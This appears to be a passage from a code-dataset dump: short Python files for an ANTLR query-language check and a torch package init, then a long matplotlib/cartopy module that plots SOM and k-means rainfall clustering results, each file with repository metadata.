4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | 2
|
2020-09-17T19:11:45.000Z
|
2020-09-24T08:13:22.000Z
|
query_lang/run_antlr.py
|
nikitavlaev/formal-languages
|
4e5212858e7cdaa6f2d5130189f88b66e317d25f
|
[
"Unlicense"
] | null | null | null |
from query_lang.parsing import ANTLRGrammar
from pathlib import Path
print(ANTLRGrammar(Path('/home/nikita/prog/formal-languages/query_lang/tests/test_data/test5/input.txt')).check())
| 46
| 114
| 0.826087
| 27
| 184
| 5.518519
| 0.777778
| 0.120805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005714
| 0.048913
| 184
| 4
| 114
| 46
| 0.845714
| 0
| 0
| 0
| 0
| 0.333333
| 0.416216
| 0.416216
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf68cd1d4566a68f9c89b95b8b02b1279ef83491
| 109
|
py
|
Python
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 33
|
2021-02-26T10:03:28.000Z
|
2022-03-23T07:24:51.000Z
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 7
|
2021-03-10T11:52:48.000Z
|
2022-02-06T18:31:09.000Z
|
torch_base/__init__.py
|
kushantp58/RL_CARLA
|
c5fe2a9743d985f03fe824b7b39cfcb3f9dfb0bc
|
[
"Apache-2.0"
] | 7
|
2021-03-17T10:27:07.000Z
|
2022-01-27T05:47:38.000Z
|
from torch_base.torch_model import *
from torch_base.torch_sac import *
from torch_base.torch_agent import *
| 27.25
| 36
| 0.834862
| 18
| 109
| 4.722222
| 0.388889
| 0.317647
| 0.458824
| 0.635294
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110092
| 109
| 3
| 37
| 36.333333
| 0.876289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cf7f1b42b10c2f699a550340c1493a741ddba20b
| 188,442
|
py
|
Python
|
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
lib/visualization.py
|
mace2305/c4rainfall
|
ab8343447030e89661f297e4513ac7e826b07a8b
|
[
"MIT"
] | null | null | null |
"""
- loading of SOM products
- functions for generating intermediate plots (SOM model)
- functions for generating final output plots (RHUM, Quiver, AR, kmeans model, RF)
- loading of validation metrices
- functions for generating metrices plots (elbow/CH/DBI, sil plots, DBSCAN)
- misc plot creation functions
- functions for generation of evaluations on full-model
"""
import utils
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import seaborn as sns
import pandas as pd
import cartopy.crs as ccrs
import matplotlib.colors as colors
import dask.array as da
from matplotlib import cm
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from cartopy import feature as cf
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
from shapely import geometry
from timeit import default_timer as timer
from sklearn.preprocessing import minmax_scale, RobustScaler
from sklearn.metrics import brier_score_loss
import collections, gc, time, logging
mpl.rcParams['savefig.dpi'] = 300
logger = logging.getLogger()
mpl_logger = logging.getLogger('matplotlib')
mpl_logger.setLevel(logging.WARNING)
print = logger.info
def grid_width(cluster_num, i=0): # 3 closest is 4 so return 2; 6 closest is 9 so return 3; 11 closest is 16 so return 4, etc.
"""
Function to acquire appropriate (square) grid width for plotting.
"""
while i**2 < cluster_num:
i+=1;
return i
def create_multisubplot_axes(n_expected_clusters, width_height=12):
"""
Returns fig object, width/height of figure based off n_expected_clusters, and gridspec created for fig obj.
Good for creating fig obj to use in Jupyter Notebook
"""
fig = plt.figure(constrained_layout=False, figsize=(width_height, width_height))
gw = grid_width(n_expected_clusters)
gridspec = fig.add_gridspec(gw, gw)
return fig, gridspec
def create_solo_figure(width_height=15):
fig = plt.figure(figsize=(width_height, width_height))
return fig, fig.add_subplot(111)
def categorical_cmap(nc, nsc, cmap="tab10", continuous=False):
if nc > plt.get_cmap(cmap).N:
raise ValueError("Too many categories for colormap.")
if continuous:
ccolors = plt.get_cmap(cmap)(np.linspace(0,1,nc))
else:
ccolors = plt.get_cmap(cmap)(np.arange(nc, dtype=int))
cols = np.zeros((nc*nsc, 3))
for i, c in enumerate(ccolors):
chsv = mpl.colors.rgb_to_hsv(c[:3])
arhsv = np.tile(chsv,nsc).reshape(nsc,3)
arhsv[:,1] = np.linspace(chsv[1],0.25,nsc)
arhsv[:,2] = np.linspace(chsv[2],1,nsc)
rgb = mpl.colors.hsv_to_rgb(arhsv)
cols[i*nsc:(i+1)*nsc,:] = rgb
cmap = mpl.colors.ListedColormap(cols)
return cmap
def get_meshgrid_xy(model):
x = np.arange(model.gridsize)
y = np.arange(model.gridsize)
return [pt for pt in np.meshgrid(x,y)]
def print_som_scatterplot_with_dmap(model, dest):
# n_datapoints, model.month_names, years, hyperparam_profile,
# mg1, mg2, dmap, winner_coordinates, target_ds, uniq_markers,
# data_prof_save_dir, startlooptime, model.month_names_joined):
## plot 1: dmap + winner scatterplot, obtained via SOM
som_splot_withdmap_starttime = timer(); print(f"{utils.time_now()} - Drawing SOM scatterplot with distance map now.")
iterations, gridsize, training_mode, sigma, learning_rate, random_seed = model.hyperparameters
fig, ax_dmap_splot = create_solo_figure()
mg1, mg2 = get_meshgrid_xy(model)
winner_coordinates = utils.open_pickle(model.winner_coordinates_path)
dmap = utils.open_pickle(model.dmap_path)
target_ds = utils.open_pickle(model.target_ds_preprocessed_path)
# dmap underlay
dmap_col = "summer_r"
ax_dmap_splot.set_title(f"Plots for months: {model.month_names}, {model.sigma} sigma, {model.learning_rate} learning_rate, {model.random_seed} random_seeds\n{model.n_datapoints} input datapoints mapped onto SOM, {iterations} iters, overlaying inter-node distance map (in {dmap_col}).", loc='left')
ax_dmap_splot.use_sticky_edges=False
ax_dmap_splot.set_xticks([i for i in np.linspace(0, gridsize-1, gridsize)])
ax_dmap_splot.set_yticks([i for i in np.linspace(0, gridsize-1, gridsize)])
dmap_plot = ax_dmap_splot.pcolor(mg1, mg2,
dmap, cmap=(cm.get_cmap(dmap_col, gridsize)),
vmin=0, alpha=0.6)
# winners scatterplot
winners_scatterpoints = winner_coordinates + (np.random.random_sample((model.n_datapoints,2))-0.5)/1.2
markers = np.array([model.uniq_markers[month-1] for month in target_ds['time.month'].data]) # list of markers pertaining to this data subset
colors = sns.color_palette("copper", len(model.years)) # colors
cmap, norm = mpl.colors.from_levels_and_colors(range(0, len(model.years)+1), colors)
row_to_colors_dict = {yr:colors[i] for i, yr in enumerate(model.years)} # {2001: (RGB), 2002: (RGB), ...}
years_to_colors = [row_to_colors_dict[yr] for yr in target_ds['time.year'].data] # 2001-01-01: (RGB), 2001-01-02: ...
plots_for_legend = []
for marker in model.uniq_markers:
mask = markers == marker
if len(winners_scatterpoints[:,1][mask])>0:
plots_for_legend.append(ax_dmap_splot.scatter(
winners_scatterpoints[:,1][mask],
winners_scatterpoints[:,0][mask],
norm=norm, marker=marker,
c=np.array(years_to_colors)[mask],
s = 130,
alpha=0.8,
linewidths=1))
# colorbars for dmap & winners_scatterpoints s-plot
axins_dmap = inset_axes(ax_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0,-.05,.99,.015),
bbox_transform=ax_dmap_splot.transAxes);
cbar_dmap = fig.colorbar(dmap_plot, cax=axins_dmap,
label='Distance from other nodes (0.0 indicates a complete similarity to neighboring node)',
orientation='horizontal', pad=0.01);
axins_splot = inset_axes(ax_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(-.1, 0, .01, .99),
bbox_transform=ax_dmap_splot.transAxes); # geometry & placement of cbar
cbar_splot = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=axins_splot,
ticks=[i+.5 for i in range(len(model.years))], orientation='vertical', pad=0.5);
cbar_splot.ax.set_yticklabels(model.years); cbar_splot.ax.tick_params(size=3)
ax_dmap_splot.legend(plots_for_legend, model.month_names, ncol=4, loc=9);
print(f"Time taken is {utils.time_since(som_splot_withdmap_starttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_prelim_SOMscplot_{gridsize}x{gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_kmeans_scatterplot(model, dest, optimal_k):
start_kmeanscatter = timer(); print(f"{utils.time_now()} - starting kmeans scatterplot now...")
dmap = utils.open_pickle(model.dmap_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
labels_to_coords = utils.open_pickle(model.labels_to_coords_path)
label_markers = utils.open_pickle(model.label_markers_path)
fig, ax_kmeans_dmap_splot = create_solo_figure()
mg1, mg2 = get_meshgrid_xy(model)
# dmap
dmap_base_ax = fig.add_subplot(111)
dmap_base_ax.set_xticks([i for i in np.linspace(0, model.gridsize-1, model.gridsize)])
dmap_base_ax.set_yticks([i for i in np.linspace(0, model.gridsize-1, model.gridsize)])
dmap_col = "CMRmap_r"
dmap_plot = ax_kmeans_dmap_splot.pcolor(mg1, mg2,
dmap, cmap=(mpl.cm.get_cmap(dmap_col, model.gridsize)),
vmin=0, alpha=.7);
dmap_plot.use_sticky_edges=False;
axins_dmap = inset_axes(ax_kmeans_dmap_splot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0,-.05,.99,.015),
bbox_transform=ax_kmeans_dmap_splot.transAxes);
cbar_dmap = fig.colorbar(dmap_plot, cax=axins_dmap,
label='Distance from other nodes (0.0 indicates a complete similarity to neighboring node)',
orientation='horizontal', pad=0.01);
# scatterplot
num_col, sub_col = (int(optimal_k/2),2) if (optimal_k%2==0) & (optimal_k>9) else (
optimal_k, 1);
c2 = categorical_cmap(13, 2, cmap="tab20c");
y = minmax_scale(labels_ar)
x = labels_to_coords
colors = c2(y)
ax_kmeans_dmap_splot.set_title('2nd clustering via K-means')
for marker in np.unique(label_markers):
mask = label_markers == marker
if len(x[:,1][mask]) > 0:
ax_kmeans_dmap_splot.scatter(
x[:,1][mask],
x[:,0][mask],
alpha=1, marker=marker, s=140, c=colors[mask], linewidths=1, edgecolors=None)
ax_kmeans_dmap_splot.set_facecolor('black')
ax_kmeans_dmap_splot.use_sticky_edges=False
ax_kmeans_dmap_splot.margins(.07,.07)
print(f"Time taken is {utils.time_since(start_kmeanscatter)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_kmeans-scplot_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ar_plot(model, dest, optimal_k):
ARMonthFracstarttime = timer(); print(f"{utils.time_now()} - starting ar drawing now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
fig, gs_ARMonthFrac = create_multisubplot_axes(optimal_k)
half_month_names = np.ravel([(f'{i} 1st-half', f'{i} 2nd-half') for i in model.month_names])
c4 = categorical_cmap(8, 4, cmap="Dark2_r")
color_indices = np.ravel([(2*(i-1), 2*(i-1)+1) for i in model.months])
for i in range(optimal_k):
ax_ARMonthFrac = fig.add_subplot(gs_ARMonthFrac[i])
cluster_months = target_ds_withClusterLabels.where(target_ds_withClusterLabels.cluster==i, drop=True)['time.month']
firsthalf = cluster_months[cluster_months['time.day']<=15]
secondhalf = cluster_months[cluster_months['time.day']>15]
firsthalf_counts = collections.Counter(firsthalf.data)
secondhalf_counts = collections.Counter(secondhalf.data)
halfmth_label_fraction = np.ravel([(firsthalf_counts[mth], secondhalf_counts[mth]) for mth in model.months])
total_occurances = sum(halfmth_label_fraction)
perc_of_total_sampling = np.round((total_occurances/model.n_datapoints)*100, 1)
patches, text = ax_ARMonthFrac.pie(halfmth_label_fraction,
radius = perc_of_total_sampling/100+.3,
colors=c4(color_indices))
ax_ARMonthFrac.annotate((f"Clust-{i+1},\n won {perc_of_total_sampling}% of rounds ({total_occurances}/{model.n_datapoints})."), (-.5,1))
if i==model.grid_width-1: ax_ARMonthFrac.legend(half_month_names, bbox_to_anchor=(0, 1.3), ncol=4)
print(f"Time taken is {utils.time_since(ARMonthFracstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_ARmonthfrac_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ar_plot_granular(model, dest, optimal_k):
ARMonthFracstarttime = timer(); print(f"{utils.time_now()} - starting ar (granular) drawing now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
all_clusters = np.unique(target_ds_withClusterLabels.cluster)
fig, axs = plt.subplots(len(model.months),1, figsize=(20,5*len(model.months)), sharey=True)
fig.subplots_adjust(right=0.8, hspace=0.3)
cbar_ax = fig.add_axes([0.81, 0.3, 0.025, 0.4])
cmap = plt.cm.summer_r
cmap.set_bad(color='thistle', alpha=0.2)
for mth_i, ax in enumerate(axs):
ds = target_ds_withClusterLabels.where(target_ds_withClusterLabels.time.dt.month==model.months[mth_i], drop=True)
n_bins=31
arr = np.empty([len(all_clusters), 31])
extent = (0, arr.shape[1], arr.shape[0], 0)
for i, clus in enumerate(all_clusters):
days = ds.where(ds.cluster==clus, drop=True)['time.day']
unique_days = list(np.unique(days))
c = {}
for num in unique_days:
c[num] = int(days.where(days==num).count().values)
arr[i] = np.array([c[d] if d in c.keys() else 0 for d in np.arange(1,32)])
arr = np.ma.masked_where(arr==0, arr)
im = ax.imshow(arr, cmap=cmap, extent=extent)
ax.set_yticks(np.arange(len(all_clusters))+.5)
ax.set_yticklabels(np.arange(len(all_clusters))+1)
ax.set_xticks(np.arange(0,31)+.5)
ax.set_xticklabels(np.arange(1,32))
ax.tick_params(labelsize=14)
ax.grid(False)
ax.set_title(f'{model.month_names[mth_i]}', fontweight='bold', fontsize=20, y=1.02)
fig.add_subplot(111,frameon=False)
plt.ylabel('Cluster', fontsize=32, fontweight='bold')
plt.xlabel('Day of month', fontsize=25, labelpad=40, fontweight='bold')
plt.xticks([])
plt.yticks([])
plt.grid(False)
cbar = fig.colorbar(im,cax=cbar_ax,
boundaries=np.arange(1, np.max(arr)+2),
ticks=np.arange(1,np.max(arr)+5)+.5)
cbar.set_label('Number occurance on particular day of month (days)', labelpad=20)
cbar.ax.set_yticklabels(np.arange(np.max(arr), dtype=int)+1);
plt.suptitle('Distribution of clusters for each month', fontweight='bold', x=.46, y=.95, fontsize=33)
plt.title('Greyed-out/non-colored regions indicate 0 occurances on such dates for these clusters.', y=1.04, fontsize=15)
print(f"Time taken is {utils.time_since(ARMonthFracstarttime)}\n")
fn = f"{dest}/{model.month_names_joined}_ARmonthfrac_granular_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_mean_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting MEAN rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.2, 4))
twnty5_to_40 = plt.cm.gist_rainbow(np.linspace(0.7, 0, 5))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Mean rainfall (mm) over {model.dir_str}', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.mean("time").T
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='black')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.5, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
if clus == 0: # title
ax_rf_plot.set_title(f"Rainfall plots from SOM nodes,\ncluster no.{clus+1}", loc='left')
else: ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data, np.linspace(0,50,51),
# cmap="terrain_r",
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_mean_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_max_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting MAX rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
# zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
# eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.2, 5))
# twnty5_to_40 = plt.cm.gist_stern(np.linspace(0.3, 0.1, 5))
# all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
a = plt.cm.pink(np.linspace(.9, .2, 2))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 6))
all_colors = np.vstack((a, b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'MAX rainfall (mm) over individual grids for domain {model.dir_str}', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.max("time").T
data_gt1mm = np.ma.masked_where(data<=1, data)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.5, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.3, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data_gt1mm,
np.arange(0,500,50),
# np.linspace(0,450,16),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01,
ticks=np.arange(0,500,50))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_max_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of >1mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
# pt1to3 = plt.cm.BrBG(np.linspace(0, .25, 3))
# pt3to6 = plt.cm.gist_earth(np.linspace(0.75, 0.4, 5))
# pt6to8 = plt.cm.ocean(np.linspace(.8, .3, 4))
# all_colors = np.vstack((pt1to3, pt3to6, pt6to8))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
# zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 5))
# eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 5))
# twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
# all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
a = plt.cm.YlOrRd(np.linspace(.9, .2, 5))
b = plt.cm.YlGnBu(np.linspace(.2, .8, 10))
all_colors = np.vstack((a,b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Proportion of grid with >1 mm of rainfall (raindays), over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\n' \
f'Note: regions in black indicate 0.0% chance of >1mm rainfall across grid members.', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
mean = np.mean([data.isel(time=t).precipitationCal.T.values > 1 for t in range(data.time.size)], axis=0)
data_pred_proba_morethan1mm = np.ma.masked_where(mean<=0, mean)*100
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='w')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data_pred_proba_morethan1mm,
np.linspace(0,100,11),
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='w', inline=True, fmt='%1.f', fontsize=8)
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%)', orientation='horizontal', pad=0.01, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavyrf_gt50mm_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of HEAVY (>50mm) rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
# fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon')
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat')
levels1 = np.linspace(-20,20,81)
levels2 = [int(i) for i in np.arange(-19, 21, 2)]
# pt1to3 = plt.cm.terrain(np.linspace(.7, .6, 3))
# pt3to6 = plt.cm.gist_ncar(np.linspace(.4, 1, 5))
# pt6to8 = plt.cm.ocean(np.linspace(.8, .4, 4))
# all_colors = np.vstack((pt1to3, pt3to6, pt6to8))
# terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
# zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
# eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
# twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
# all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
